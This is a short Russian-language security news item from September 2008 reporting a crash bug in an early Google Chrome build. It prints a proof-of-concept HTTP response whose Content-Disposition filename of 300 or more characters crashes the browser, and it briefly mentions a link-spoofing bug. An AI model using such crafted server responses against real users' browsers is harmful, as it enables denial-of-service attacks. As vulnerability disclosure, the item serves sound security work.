5 Сентября, 2008

И еще один DoS в Google Chrome (Обновлено)

Валерий Марчук
Обнаружена очередная ошибка в браузере Google Chrome. На это раз, уязвимость существует из-за недостаточной проверки входных данных в имени файла в HTTP заголовке Content-Disposition.

PoC код:
Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC

Для автоматическоо закрытия браузера без каких-либо предупреждений достаточно отправить файл, длина имени которого около 1000 символов. Для появления окна с ошибкой и аварийного завершения работы браузера достаточно 300 символов в имени файла.


Ответ сервера, завершающий работу браузера:
HTTP/1.1 200 OK
Date: Fri, 05 Sep 2008 06:48:34 GMT
Server: Apache/2.2.6 (Win32)
Content-Disposition: attachment; filename=<от 300 символов>.psd
Content-Length: 4
Connection: close
Content-Type: application/octet-stream

test


===============================================================
UPDATE
05.06.2008 14.46
===============================================================
На сайте PandaSecurity.com опубликовано видео с демонстрацией очередной ошибки в браузере. Уязвимость существует из-за ошибки при отображении адреса ссылки в строке состояния, при наведении курсора мышки на специально сформированную ссылку, добавленную в папку "Избранное".


Кому интересно, можно посмотреть статистику по использованию браузера Chrome по сравнению с другими браузерами:
http://blog.statcounter.com/2008/09/chrome-whos-losing/